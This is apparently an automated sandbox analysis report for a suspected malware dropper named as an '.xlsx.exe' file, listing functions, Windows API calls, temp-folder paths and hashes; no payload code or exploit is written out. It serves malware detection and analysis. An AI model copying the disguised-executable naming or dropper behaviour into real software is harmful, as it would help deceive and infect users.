Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5

Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C01
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE8, 00405BEC
nsa, xrefs: 00405BF0

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54

Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403192

Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
WriteFile.KERNELBASE(0040BE90,00411737,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
SetFilePointer.KERNELBASE(00004DC4,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347

Strings

1033, xrefs: 0040334E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403327, 0040332C, 00403332, 0040333E, 00403346, 0040334D

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3512041753
Opcode ID: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
Opcode Fuzzy Hash: add472499a8119111063815a34edcff77b501a95eafb2cc4bed7984a25da3e62
Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE

Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44

Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44

Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44

Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84

Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44

Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44

Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44

Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9

Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FC3

Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FD4
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 00402051

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C

RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
